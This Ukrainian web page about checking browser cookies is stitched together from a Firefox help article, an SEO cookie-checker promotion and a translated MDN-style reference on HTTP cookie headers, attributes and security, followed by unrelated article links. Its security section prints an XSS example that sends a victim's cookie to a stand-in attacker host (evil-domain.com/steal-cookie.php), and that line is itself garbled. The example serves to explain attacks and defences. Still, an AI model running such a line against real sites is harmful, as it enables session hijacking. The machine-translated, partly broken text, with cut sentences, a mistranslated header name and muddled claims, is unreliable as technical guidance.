Як перевірити чи є куки

Як перевірити чи є куки



Кукі - інформація, яку веб-сайти зберігають на вашому комп'ютері

У цій статті описано, що таке "куки", як вони використовуються і як ви можете керувати куками, які зберігає Firefox.

Зміст

Що таке кукі?

Cookies є інформацією, що зберігається на Вашому комп'ютері веб-сайтом, який Ви відвідуєте.

Cookie часто зберігають ваші налаштування для веб-сайту, наприклад статус логіна і відданий мову або місцезнаходження. , що відповідає вашим потребам.

Куки можуть зберігати широкий діапазон інформації, включаючи персональні дані (наприклад, Ваше ім'я, домашню адресу, адресу електронної пошти або номер телефону). отримати доступ до інформації, яку Ви їм не надали, і вони не можуть отримати доступ до інших файлів на Вашому комп'ютері.

За промовчанням, дії для зберігання та надсилання куків для вас невидимі. Проте, Ви можете змінити налаштування Firefox, щоб дозволити Вам особисто схвалювати або відхиляти запити на збереження кук, автоматично видаляти збережені куки при закритті Firefox та багато іншого.

Налаштування куки

Ви можете відкрити Налаштування вашого Firefox, щоб керувати cookie наступним чином:

  1. На панелі меню у верхній частині екрана натисніть Firefox і виберіть Параметри або Установки залежно від версії macOS.Натисніть кнопку меню та виберіть Установки.
  2. Виберіть панель Приватність та Захист.

Налаштування куки під Поліпшений захист від відстеження і Куки та дані сайтів.

Для отримання інструкцій про те, як керувати налаштуваннями кук для певних завдань, прочитайте:

  • Видалення куків та даних сайтів у Firefox: Як видалити куки, які вже були збережені веб-сайтами.
  • Як не давати веб-сайтам зберігати куки та дані сайтів у Firefox: Як не давати певним веб-сайтам зберігати куки.
  • Сторінні куки та захист від відстеження Firefox: Як не давати веб-сайтам, за винятком того, на якому Ви зараз знаходитесь, зберігати куки.

Усунення проблем з куки

Якщо у Вас виникли проблеми з Firefox, що стосуються куки, прочитайте:

Ці чудові люди допомогли написати цю статтю:

Стати волонтером

Ростіть і ділитеся досвідом з іншими. Відповідайте на запитання та покращуйте нашу базу знань.

Website Cookie Checker

Отримайте доступ до повного аудиту сайту, який включає понад 300 технічних аспектів.

Безкоштовний інструмент для SEO перевірки та аудиту сайту

  • Скануйте сайт на наявність 300+ технічних проблем
  • Моніторинг стану сайту 24/7
  • Слідкуйте за рейтингом сайту в будь-якій географічній зоні

Якщо ви власник веб-сайту, який цінує конфіденційність відвідувачів, ви, ймовірно, запитували себе: «Чи використовує мій веб-сайт файли cookie?» Якщо ви шукаєте інструмент для перевірки, читайте далі; ми розповімо все, що вам потрібно знати про інструменти перевірки файлів cookie.

Що таке файл cookie пошук?

Почнемо з пояснення того, що таке файли cookie та як вони працюють. Найчастіше це файли cookie HTTP, також відомі як веб-файли cookie або файли cookie браузера, на які посилається термін файли cookie.використовується у зв'язку з обслуговуванням веб-сайту (Chrome, Firefox тощо). Насправді це єдиний у своєму роді тег, який веб-сайти розміщують на комп'ютері користувача, щоб отримати уявлення про його моделі поведінки. У випадку, якщо користувач повертається на певну URL-адресу, файли cookie дозволяють веб-сайту «запам'ятати» цього користувача та надати йому інформацію, яка раніше вважалася цінною (логін, пароль тощо). Коли користувачі повертаються на веб-сайт, файли cookie використовуються для їх ідентифікації (аутентифікації) та відображення «персоналізованих» сторінок, адаптованих до їх конкретних вимог та інтересів.

Файли cookie класифікуються за такими критеріями:

  • Сеансові файли cookie. Ці файли cookie залишаються активними, поки відкрита консоль, яка активувала файл cookie. Цей файл cookie сеансу видаляється, коли користувач виходить із браузера.
  • Постійні файли cookie. Ці файли cookie зберігаються на комп'ютері користувача необмежений час і можуть зберігатися місяцями або роками.

Файли cookie необхідні за законом для правильної роботи веб-сайту — наприклад, файли cookie, які перевіряють, чи ви вже увійшли до системи. Необов'язкові файли cookie не потрібні для роботи веб-сайту. Вони часто вводяться веб-сайтом для надання нових функцій — наприклад, файли cookie, які дозволяють відображати рекламу, яку бачать на деяких веб-сайтах.

Веб-сайт, який зараз переглядає користувач або знайшов, встановлює власні файли cookie. Вони надають такі послуги, як відстеження статусу входу в систему та збереження вмісту кошика покупок. Інші файли cookie — це файли, які розміщуються іншими веб-сайтами або сторонніми інструментами для відстеження поведінки користувача на цьому сайті. Наприклад, файли cookie Google Analytics перевіряють та перевіряють користувачів для вимірювання конверсій.

Коли браузер закривається і сеанс завершується, термін дії файлів cookie сеансу закінчується. Сеансові файли cookie, наприклад, можуть перебувати на веб-сайті магазину та зберігати товари в кошику, навіть якщо користувач переходить на іншу сторінку. З іншого боку, постійні файли cookie , залишаються в браузері користувача протягом більш тривалого періоду часу і закінчуються лише при досягненні зазначеної ним дати закінчення терміну дії. На відміну від сеансових файлів cookie, постійні файли cookie зберігають продукти та статистику покупок в онлайн-кошику, коли користувач закриває браузер, дозволяючи отримати доступ до них при наступному відвідуванні.

Що таке засіб перевірки файлів cookie?

Перевірка файлів cookie – це інструмент, який надає детальну інформацію про всі файли cookie, збережені певним веб-сайтом під час вашого сеансу. Інструмент є ідентифікатором, який відображає файли cookie на екрані та перевіряє безпеку веб-сайту.

Використання інструменту перевірки файлів cookie (як використовувати)

Крок 1. Вставте URL-адресу


Коли адреса буде додана в засіб перевірки файлів cookie, ви отримаєте результат, аналогічний показаному нижче.

Крок 2. Інтерпретація результатів інструмента перевірки файлів cookie

Випадки, коли потрібна перевірка файлів cookie

Чи можна видалити куки з комп'ютера? Більшість сучасних браузерів дозволяють вибирати, приймати або відхиляти файли cookie, і ви можете видаляти файли cookie з меню «історія» вашого браузера після кожного сеансу онлайн.

Зрештою, те, яким правилам ви дотримуєтеся, визначає дуже багато. У деяких випадках виявлення та видалення файлів cookie може ускладнити використання функцій веб-сайту, наприклад кошика покупок. Прийняття файлів cookie реєстратора в деяких ситуаціях дозволяє рекламодавцям стежити за поведінкою у своїх інтересах, а не в інтересах користувачів.

Файли cookie призначені для того, щоб бути корисними, і вони використовуються частіше, ніж ви вважаєте. Ось кілька прикладів, коли файли cookie були збережені у вашій системі та повинні бути видалені.

Покупки. Файли cookie допомагають розміщувати товари у віртуальному кошику покупок на сайтах роздрібної торгівлі. За допомогою файлів cookie ви можете переглядати веб-сайт, на якому відображаються товари, і в будь-який час додавати або видаляти їх зі свого кошика покупок.

Реєстрація-up. Файли cookie полегшують вхід на веб-сайти. Коли ви входите на веб-сайт зі своїм ім'ям користувача та паролем, файли cookie допомагають попереджати веб-сайт про те, що ви вже авторизовані, дозволяючи вам виконувати дії, які можуть робити тільки зареєстровані клієнти (що увійшли до системи).

Персоналізація. Веб-сайти також використовують файли cookie для персоналізації вмісту залежно від вибору користувача. Google, наприклад, дозволяє вибрати кількість записів на сторінці, яку ви бажаєте бачити.

Дослідження та релевантність. Маркетологи та рекламодавці використовують файли cookie, щоб регулювати вашу поведінку в Інтернеті та передавати цю інформацію рекламодавцю. На основі цієї інформації рекламодавець може вибрати, який тип реклами показувати на веб-сторінці, поки ви знаходитесь в мережі. Не випадково реклама певної марки взуття або комп'ютера відображається на бічній панелі веб-сторінки після того, як ви її переглядаєте.

Різні типи файлів cookie

Файли cookie використовуються з низки причин, але вони працюють однаково:

  • Пакети даних, які відправляються та приймаються без змін, на зорі обчислювальної техніки називалися магічними файлами cookie. Це був знак і частіший метод отримання доступу до комп'ютерних систем баз даних, наприклад, у внутрішній мережі компанії. Ця концепція передує сучасній концепції файлу cookie.
  • файли cookie HTTP – це перепрофільована версія “чарівних файлів cookie“, розроблена спеціально для використання в Інтернеті. У 1994 році програміст веб-браузера Лу Монтуллі був натхненний "чарівним файлом cookie". Коли він допомагав сайту онлайн-покупок зі своїми перевантаженими серверами, він відтворив цю концепцію для браузерів.

Файли cookie HTTP В даний час використовуються для адміністрування роботи в Інтернеті. Деякі зловмисники можуть використовувати його для аналізу інтернет-активності та крадіжки особистої інформації.

Інші способи перевірки файлів cookie

Google Chrome:

Відкрийте нове приватне вікно та вивчіть URL-адресу вашого веб-сайту. Запустіть програму Інструменти розробника. Це залежить від вашого браузера. Chrome: Перегляд > Розробник > Інструменти розробника або CMD+ALT+I на Mac або F12 на Windows.

Firefox:

З Mozilla Firefox ви можете перевірити файли cookie та домени, на які вони надсилають дані. Відкрийте нове приватне вікно та вивчіть URL-адресу вашого веб-сайту. Запустіть програму Інструменти розробника. Натисніть CMD + ALT + I або F12 на Mac або ПК, щоб відкрити інспектор сховища Firefox.

Сафарі:

У Safari виконайте такі дії, щоб перевірити файли cookie та домени, на які вони надсилають дані:

Відкрийте нове приватне вікно та вивчіть URL-адресу вашого веб-сайту. Запустіть програму Інструменти розробника. Натисніть CMD + ALT + I на Mac або F12 на ПК, щоб відкрити веб-інспектор Safari.

Правильно налаштувати cookie це важливо, але не головне у вашому SEO!

Проведіть повний аудит сайту, щоб перевірити інші технічні аспекти вашого SEO та виправити їх.

Що таке файли cookie на веб-сайті?

Коли користувач відвідує веб-сайт, файли cookie зберігаються у його браузері та обробляють особисті дані, такі як IP-адреси, унікальні ідентифікатори, історію пошуку та історію переглядів. Це не тільки дозволяє веб-сайтам запам'ятовувати конкретних відвідувачів, коли вони повертаються, але також дозволяє іншим веб-сайтам і компаніям, що займаються рекламними технологіями, знаходити людей в Інтернеті.
Сторонні файли cookie будуть встановлені відповідно до законодавства на вашому веб-сайті, якщо ви використовуєте плагіни соціальних мереж, інструменти аналізу або маркетингове програмне забезпечення. Усі файли cookie, які не обов'язково є законними для основних функцій вашого веб-сайту, повинні бути відключені доти, доки користувачі не дадуть згоди на їх активацію.

Як перевірити файли cookie?

Сканер файлів cookie, що іноді називається засобом перевірки файлів cookie, є скануванням інструмент, який сканує веб-сайт на наявність файлів cookie і надає повний звіт про сканування файлів cookie. Він сканує веб-сайт, активує всі файли cookie та збирає всю необхідну інформацію про них. Це займає менше часу, ніж ручна перевірка файлів cookie у браузері. Замість перегляду інформації про кожен файл cookie ви можете отримати спрощений звіт. Інформація є повною і підходить для включення у ваші файли cookie або політику конфіденційності. Після того, як ви надасте URL-адресу, вона просканує сторінку та виявить файли cookie за лічені секунди. Потім він створить звіт про сканування, що містить інформацію про файли cookie, таку як їх ім'я, тип, опис (призначення), домен та тривалість. Ця інформація може бути передана користувачам вашого веб-сайту, що зробить вас на один крок ближче до дотримання вимог.

Чи використовує мій веб-сайт файли cookie?

Можливо! Дотримуючись цих простих процедур, можна швидко та просто дізнатися, які файли cookie може використовувати веб-сайт. (Примітка. Для цього рекомендується переглядати сайт у приватному режимі, оскільки це запобігає завантаженню файлів cookie з інших веб-сайтів. Крім того, переконайтеся, що у вашому браузері відключено блокування файлів cookie). Правильне керування файлами cookie веб-сайту є критично важливим аспектом забезпечення відповідності.

HTTP-кукі

HTTP cookie (web cookie, cookie браузера) - це невеликий фрагмент даних, який сервер надсилає браузеру користувача.Браузер може зберегти цей фрагмент у себе та відправляти на сервер з кожним наступним запитом. Це, зокрема, дозволяє дізнатися, чи з одного браузера надійшло кілька запитів (наприклад, для автентифікації користувача). За допомогою кук можна зберегти будь-яку інформацію про стан, HTTP-протокол сам собою цього робити не вміє.

Куки часто використовуються для:

  • Управління сеансом (логіни, кошики для віртуальних покупок)
  • Персоналізації (уподобання користувача)
  • Трекінгу (відстеження поведінки користувачів)

Донедавна куки використовувалися як сховища інформації на стороні користувача. Це могло мати сенс без варіантів, але тепер, коли в розпорядженні браузерів з'явилися різні API для зберігання даних, це вже не так. Через те, що куки пересилаються з кожним запитом, вони можуть погіршувати продуктивність (особливо при використанні мобільних мереж). В якості сховищ даних на стороні користувача замість них можна використовувати Web storage API (localStorage та sessionStorage) та IndexedDB.

Примітка: Щоб переглянути збережені куки та інші сховища даних, які використовує веб-сторінку, можна використовувати Storage Inspector (Інспектор сховища) в інструментах розробника.

Створення кукі

Отримавши HTTP-запит, разом із відповіддю сервер може надіслати заголовок Set-Cookie. Куки зазвичай запам'ятовуються браузером і надсилаються в HTTP-заголовку Cookie з кожним новим запитом до одного сервера. Можна задати термін дії кук, а також термін їхнього життя, після якого кукі не вирушатимуть. Також можна вказати обмеження на шлях і домен, тобто вказати, протягом якого часу і до якого сайту вони надсилатимуться.

Заголовки Set-Cookie та Cookie

Заголовок Set-Cookie HTTP-відповіді використовується для надсилання cookie з сервера до клієнтської програми (браузер). Простий куки може задаватися так:

Цей заголовок із сервера дає клієнту вказівку зберегти куки (це роблять, наприклад, PHP, Node.js, Python та Ruby on Rails). Відповідь, що надсилається браузеру, містить заголовок Set-Cookie і куки запам'ятовується браузером.

HTTP/1.0 200 OK Назад-тип: text/html Set-Cookie: yummy_cookie=choco Set-Cookie: tasty_cookie=strawberry [page content]

Тепер з кожним новим запитом до сервера за допомогою заголовка Cookie браузер повертатиме серверу всі збережені раніше куки.

GET /sample_page.html HTTP/1.1 Host: www.example.org Cookie: yummy_cookie=choco; tasty_cookie=strawberry

Сесійні cookie

Простий cookie, приклад якого наведений вище, є сесійним cookie (session cookie) - такі cookie видаляються під час закриття клієнта, тобто існують лише протягом поточного сеансу, оскільки атрибути Expires або Max-Age для нього не задаються. Однак, якщо у браузері включено автоматичне відновлення сеансу, що трапляється дуже часто, cookie сеансу може зберігатися постійно, начебто браузер ніколи не закривався.

Постійні cookies

Постійні cookie (permanent cookies) видаляються не із закриттям клієнта, а при настанні певної дати (атрибут Expires) або після певного інтервалу часу (атрибут Max-Age).

Set-Cookie: Expires=Wed, 21 Oct 2015 07:28:00 GMT;

Secure ("безпечні") і HttpOnly куки

"Безпечні" (secure) куки надсилаються на сервер лише тоді, коли запит надсилається протоколом SSL і HTTPS.Однак важливі дані ніколи не слід передавати або зберігати в куках, оскільки сам їхній механізм дуже вразливий щодо безпеки, а прапор secure ніякого додаткового шифрування або засобів захисту не забезпечує. Починаючи з Chrome 52 і Firefox 52, незахищені сайти (http:) не можуть створювати куки з прапором Secure.

Куки HTTPonly не доступні з JavaScript через властивості Document.cookie API, що допомагає уникнути міжсайтового скриптингу (XSS). Встановлюйте цей прапор для тих кук, до яких не потрібно звертатися через JavaScript. Зокрема, якщо куки використовуються тільки для підтримки сеансу, то JavaScript не потрібні, так що в цьому випадку слід встановлювати прапор HttpOnly .

Set-Cookie: Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly

Область видимості куки

Директиви Domain і Path визначають область видимості куки, тобто URL-адреси, до яких куки будуть надсилатися.

Атрибут Domain

Атрибут Domain вказує хости, на які надсилаються куки. Якщо вона не задана, то за замовчуванням береться доменна частина адреси документа (але без піддоменів). Якщо домен вказано явно, піддомени завжди включені.

Наприклад, якщо встановлено Domain=mozilla.org , то куки включені і в піддоменах, наприклад, в developer.mozilla.org .

Атрибут Path

Атрибут Path вказує URL, який повинен бути в запитуваному ресурсі на момент надсилання заголовка Cookie. Символ %x2F ("/") інтерпретується як роздільник в URL-шляху, підшляхи також враховуватимуться.

Якщо заданий Path=/docs , то збігатимуться такі пути:

А ці шляхи збігатися не будуть:

Куки SameSite

Куки відправляються на сервер за будь-яких запитів, навіть якщо запитується статичний ресурс з чужого сервера, тобто якщо відбувається міжсайтовий запит. Наприклад, якщо сторінка сайту site.com містить зображення сайту site.net, при запиті зображення у запиті будуть надіслані всі куки користувача для site.net. Щоб обмежити відправлення кук лише тому сайту, якому вони належать, використовують атрибут SameSite.

За допомогою атрибуту SameSite можна вказати, коли і як надсилати куки з міжсайтовими запитами (де сайт визначається комбінацією домену та схеми http: або https: ). Деякою мірою цей атрибут захищає від міжсайтової підробки запиту (CSRF). SameSite може приймати три можливі значення: Strict, Lax і None.

З атрибутом Strict кукі будуть надсилатися тільки тому сайту, якому ці куки належать. Атрибут Lax працює схоже, але кукі будуть відправлятися також при навігації на той сайт, якому належать куки. Наприклад, при переході на посилання із зовнішнього сайту. Атрибут None вимикає обмеження на відправлення кук для міжсайтових запитів, але тільки в безпечному контексті (тобто якщо встановлений SameSite=None, тоді також має бути встановлений атрибут Secure). Якщо атрибут SameSite не встановлено, cookie будуть сприйматися як Lax .

Set-Cookie: mykey = myvalue; SameSite=Strict

Примітка: У таблиці сумісності можна знайти інформацію про те, як обробляються атрибути в конкретних версіях браузерів.

Куки з префіксами

Через дизайн механізму кук сервер не може підтвердити, що куки були відправлені із захищеного джерела (secure origin), або бути впевненим у тому, де саме вони були встановлені.

Вразлива програма піддомену може встановити куку з атрибутом Domain , тим самим відкриваючи доступ до неї на всіх інших піддоменах. Цей механізм може експлуатуватися з атакою фіксація сесії.

Примітка: Ознайомтеся зі статтею фіксації сесії, щоб дізнатися про основні методи захисту від цієї атаки.

Тим не менш, відповідно до принципу захисту в глибину ви можете використовувати кукі з префіксами, щоб гарантувати специфічні факти про куки. Доступні два префікси:

Якщо кука містить цей префікс, вона буде встановлена ​​заголовком Set-Cookie тільки в тому випадку, якщо кука міститиме атрибут Secure і якщо запит буде надсилатися із захищеного джерела. Також кука не повинна включати атрибут Domain і містити атрибут Path зі значенням / .

Якщо кука містить цей префікс, вона буде встановлена ​​заголовком Set-Cookie тільки в тому випадку, якщо кука міститиме атрибут Secure і якщо запит буде надсилатися із захищеного джерела. Захист за допомогою цього префікса слабший у порівнянні з префіксом __Host-.

Браузери будуть відхиляти встановлення цих кук, якщо вони не задовольнятимуть всі обмеження. Зауважте, що куки з префіксами, створені в рамках піддомену, обмежуватимуться лише ним або повністю ігноруватимуться. Оскільки бекенд перевіряє лише куки з заздалегідь відомими іменами при авторизації користувача або валідації CSRF-токена, куки з префіксами фактично працюють як захисний механізм від фіксації сесії.

Примітка: Бекенд веб-додатки зобов'язаний звертатися за повним ім'ям куки, включаючи префікс. Користувальницькі агенти не видаляють префікс з імені кук перед їх відправкою в HTTP-заголовку Cookie.

Щоб отримати інформацію про статус підтримки префіксів у різних браузерах, зверніться до статті про Set-Cookie.

Доступ до JavaScript за допомогою Document.cookie

Cookie можна створювати за допомогою JavaScript, використовуючи DOM-властивість Document.cookie .

document.cookie = "yummy_cookie=choco"; document.cookie = "tasty_cookie=strawberry"; console.log(document.cookie);

Куки, створені за допомогою JavaScript, не можуть містити атрибуту HttpOnly .

Будь ласка, враховуйте проблеми, про які йдеться в розділі Безпека, доступні для JavaScript, можуть бути викрадені за допомогою XSS.

Безпека

Примітка: При збереженні інформації в куках майте на увазі, що у всіх користувачів є можливість переглядати і змінювати їх значення. можливість використання альтернативних механізмів автентифікації та конфіденційності, наприклад, JSON Web Tokens

Способи запобігання атакам, що використовують куки:

  • Використовуйте атрибут HttpOnly для запобігання доступу до cookie з JavaScript.
  • Куки, які використовуються для зберігання чутливої ​​інформації, такої як автентифікаційний токен, повинні мати короткий час життя та атрибут SameSite , встановлений у Strict або Lax .У браузерах з підтримкою SameSite це гарантує запобігання надсилання кук аутентифікації з міжсайтовими запитами, фактично такі запити з точки зору бекенда стають неавтентифікованими.

Захоплення сесії (session hijacking) та XSS

Куки часто використовуються у веб-застосунках для ідентифікації автентифікованого користувача та сеансу роботи. Відповідно, викрадення кук із програми може призвести до захоплення авторизованого сеансу користувача. Крадіжка кук часто здійснюється за допомогою соціальної інженерії (Social Engineering) та використання вразливості XSS.

new Image().src = "http://www.evil-domain.com/steal-cookie.php?cookie міжсайтова_підробка_запиту_csrf_-_cross-site_request_forgery">

Міжсайтова підробка запиту (CSRF - Cross-site request forgery)

У Wikipedia є добрий приклад CSRF. У повідомлення, наприклад, у чаті або на форумі, включають "зображення", яке, насправді, є запитом до сервера банку на зняття грошей:

html

Якщо ви автентифіковані у своєму банківському обліковому записі, а куки, як і раніше, дійсні (і ніякої додаткової перевірки не потрібно), то при завантаженні HTML-документу форуму або чату з цим зображенням гроші будуть переведені з вашого рахунку. Для захисту від цього використовується низка методів:

  • Як і за XSS, важлива фільтрація вхідної інформації.
  • Для будь-якої чутливої ​​операції має запитуватись підтвердження.
  • Куки, які використовуються для чутливих операцій, повинні мати короткий термін дії.
  • Додаткову інформацію можна отримати в інструкції користувача щодо запобігання CSRF на сайті OWASP.

Трекінг та приватність

Сторонні (Third-party) куки

Куки асоціюються з певним доменом та схемою (такою як http: або https: ). Також вони можуть бути асоційовані з піддоменом за допомогою атрибуту Domain. Якщо домен і схема кук збігаються з доменом і схемою поточної сторінки, де ви знаходитесь, їх називають власними куками (first-party cookies). Якщо домен і схема кук відрізняється від домену і схеми поточної сторінки, такі куки називають сторонніми куками (third-party cookies).

Сервер, що хость сторінку, встановлює власні куки, але на сторінці можуть знаходитись зображення та інші компоненти з інших доменів (наприклад, банерна реклама), вони в свою чергу можуть встановлювати сторонні куки. Сторонні куки часто використовуються для реклами та трекінгу користувачів у мережі. Як приклад, можете переглянути куки, які встановлює Google.

Третя сторона, що контролює впровадження сторонніх кук, може створити профіль користувача на основі історії його відвідувань різних сайтів за допомогою кук, що надсилаються тим самим браузером з різних сайтів. Firefox за замовчуванням блокує сторонні куки, про які відомо, що вони використовуються для трекінгу користувачів. Сторонні куки (або просто кукі для трекінгу) можуть бути заблоковані іншими налаштуваннями браузера або розширеннями. Блокування кук у деяких ситуаціях може спричинити некоректну поведінку сторонніх компонентів, наприклад, віджетів соціальних мереж.

Примітка: Бекенд може (і повинен) встановлювати у кук атрибут SameSite для керування відправкою кук на сторонні сервери.

Законодавство, пов'язане з куки

Регулюючі акти та законодавство, що покривають куки, включають:

  • General Data Privacy Regulation (GDPR) у Європейському Союзі
  • ePrivacy Directive у Європейському Союзі
  • California Consumer Privacy Act у Штаті Каліфорнія

Ці акти та директиви діють глобально. Вони застосовуються до всіх сайтів у Всесвітній павутині, до яких користувачі з цих юрисдикцій отримують доступ (Європейський Союз та Каліфорнія, із застереженням, що Каліфорнійський закон застосовується до компаній з доходом понад 25 мільйонів доларів та кількома іншими застереженнями).

Ці акти та директиви включають такі вимоги як:

  • Повідомляти користувачам, що сайт використовує куки.
  • Давати можливість користувачам відмовлятися від отримання всіх або деяких кук.
  • Давати можливість користувачам використовувати основні функції вашого сервісу без отримання кука.

Можуть існувати інші законодавчі акти, які можуть бути застосовані до вашої локальної юрисдикції. На вас лежить відповідальність знати про них і слідувати їм. Існують компанії, які пропонують код з "кукі банером" і беруть на себе турботи про дотримання законодавства, пов'язаного з куками.

Інші способи зберігання інформації у браузері

Інший спосіб для зберігання даних у браузері - Web Storage API. Властивості window.sessionStorage і window.localStorage подібні до сесійних і постійних куків, але дозволяють зберігати більше даних і ніколи не відправляються на сервер. Для зберігання ще більшого обсягу структурованих даних може використовуватися IndexedDB API або бібліотеки, побудовані поверх нього.

Існують техніки для повторного встановлення кук після їх видалення. Такі куки називаються кукі-зомбі.Ці техніки порушують принципи приватності користувачів та контролю користувача і можуть порушувати законодавства, що регулюють приватність даних, відповідно, сайт, що їх використовує, піддається судовому розгляду.

Дивіться також

  • Set-Cookie
  • Cookie
  • Document.cookie
  • Navigator.cookieEnabled
  • SameSite cookies
  • Inspecting cookies using the Storage Inspector
  • Cookie specification: RFC 6265
  • Cookies, GDPR, ePrivacy Directive
  • HTTP cookie on Wikipedia

Схожі статті

  • Як перевірити наскільки гарний ваш комп'ютер
  • Як перевірити роботу DNS
  • Як перевірити GPS на годиннику
  • Як перевірити Герконовий датчик швидкості
  • Як перевірити ємність акумулятора на Хонор
  • Як перевірити роботу мережі
  • Як перевірити датчик задньої швидкості
  • Як перевірити інвестиційну компанію
  • Недавні статті

  • Чому взуття скрипить при ходьбі
  • Коли день народження у стрічці
  • Чи можна кішці їсти сіль
  • Варіанти планування ділянки 15 соток прямокутної форми
  • Що означає півмісяця знак
  • Рейсмусовий верстат для чого
  • У якому віці парують свиней
  • У чому полягає принцип нарахування та у яких випадках він застосовується